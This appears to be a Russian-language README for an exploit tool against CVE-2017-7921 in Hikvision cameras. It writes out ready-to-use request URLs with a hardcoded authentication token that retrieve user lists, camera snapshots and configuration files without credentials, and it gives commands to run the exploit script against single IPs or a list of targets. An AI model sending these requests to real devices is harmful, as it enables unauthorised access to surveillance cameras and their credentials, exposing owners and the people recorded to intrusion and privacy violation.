
Эксплойт для CVE-2017-7921, нацеленный на устройства Hikvision с ненадлежащей аутентификацией. Получает списки пользователей, снимки с камер и конфигурационные файлы через специально сформированные HTTP-запросы.
Проблема некорректной аутентификации была обнаружена в устройствах Hikvision.
Уязвимость некорректной аутентификации возникает, когда приложение недостаточно или неправильно аутентифицирует пользователей.
Это может позволить злоумышленнику повысить свои привилегии в системе и получить доступ к конфиденциальной информации.
# inj3ction
https://seclists.org/fulldisclosure/2017/Sep/23
Детали уязвимости:
----------------------
Получить список всех пользователей и их ролей:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Получить снимок с камеры без аутентификации:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
И самое плохое — можно скачать конфигурацию камеры:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
